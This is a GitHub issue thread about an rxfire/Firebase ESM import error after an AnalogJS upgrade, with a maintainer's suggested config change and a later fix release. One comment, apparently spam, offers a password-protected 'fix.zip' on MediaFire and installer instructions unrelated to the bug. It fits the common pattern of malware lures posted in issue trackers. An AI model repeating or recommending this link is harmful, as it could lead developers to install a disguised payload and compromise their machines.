### ISSUE TITLE
AnalogJS + Firebase issues

### ISSUE THREAD

**Issue by alexcibotari** [analogjs/analog#1296]
### Please provide the environment you discovered this bug in.

https://github.com/Lessify/localess-web

### Which area/package is the issue in?

platform

### Description

After Upgrade from AnalogJS v1.6.2-beta2 to v1.7.2 I receive next error :

### Please provide the exception or error you saw

```
**\node_modules\rxfire\auth\index.esm.js:1
import { onAuthStateChanged, onIdTokenChanged, getIdToken } from 'firebase/auth';
^^^^^^

SyntaxError: Cannot use import statement outside a module
    at wrapSafe (node:internal/modules/cjs/loader:1281:20)
    at Module._compile (node:internal/modules/cjs/loader:1321:27)
    at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
    at Module.load (node:internal/modules/cjs/loader:1208:32)
    at Module._load (node:internal/modules/cjs/loader:1024:12)
    at cjsLoader (node:internal/modules/esm/translators:348:17)
    at ModuleWrap.<anonymous> (node:internal/modules/esm/translators:297:7)
    at ModuleJob.run (node:internal/modules/esm/module_job:222:25)
    at async ModuleLoader.import (node:internal/modules/esm/loader:316:24
```

### I would be willing to submit a PR to fix this issue

- [ ] Yes
- [ ] No

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by brandonroberts** [comment]
Try adding `rxfire/**` to the `ssr.noExternal` array in the `vite.config.ts`. We're autodetecting SSR dependencies that need transforming, but this one may have not been picked up.

**Comment by alexcibotari** [comment]
Error remains exactly the same

**Comment by brandonroberts** [comment]
Fix is released in `1.7.3-beta.4`
